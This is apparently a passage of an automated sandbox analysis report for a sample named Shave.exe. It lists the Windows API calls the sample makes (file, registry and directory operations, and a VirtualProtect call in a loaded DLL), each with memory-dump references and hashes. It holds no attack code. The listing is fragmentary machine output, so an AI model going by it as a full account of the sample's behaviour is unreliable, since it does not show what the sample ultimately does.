                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                                                                                • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Shave.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 415043291-0
                                                                                                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                                                                                • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                                                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                                                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                                                                                APIs
                                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                                                                                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                                                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                                                                                APIs
                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                                                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                                                                                APIs
                                                                                                                                • VirtualProtect.KERNELBASE(6F97405C,00000004,00000040,6F97404C), ref: 6F9729B5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2386745512.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2386728456.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386788272.000000006F973000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386807263.000000006F975000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_6f970000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 1d2212d483a335b4a5761bd175da2901197f50778d403832781c65b1e50e5ed7
                                                                                                                                • Instruction ID: b41899589b7f24c5ee895a7788f02a53d2e3f451712dacbb64ef54390105b993
                                                                                                                                • Opcode Fuzzy Hash: 1d2212d483a335b4a5761bd175da2901197f50778d403832781c65b1e50e5ed7
                                                                                                                                • Instruction Fuzzy Hash: 89F0C0B155CBA0DEEB50CF7C8444B157BE0F747324B11452AE258D6283E734B064CF11
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,00406192,007A0F00,00000000,?,?,Call,?), ref: 00406128
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Open
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 71445658-0
                                                                                                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                                                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                                                                                APIs
                                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                                                                                • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                                                                                                                • Opcode Fuzzy Hash: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                                                                                • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                                                                • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                                                                                • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                                                                • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
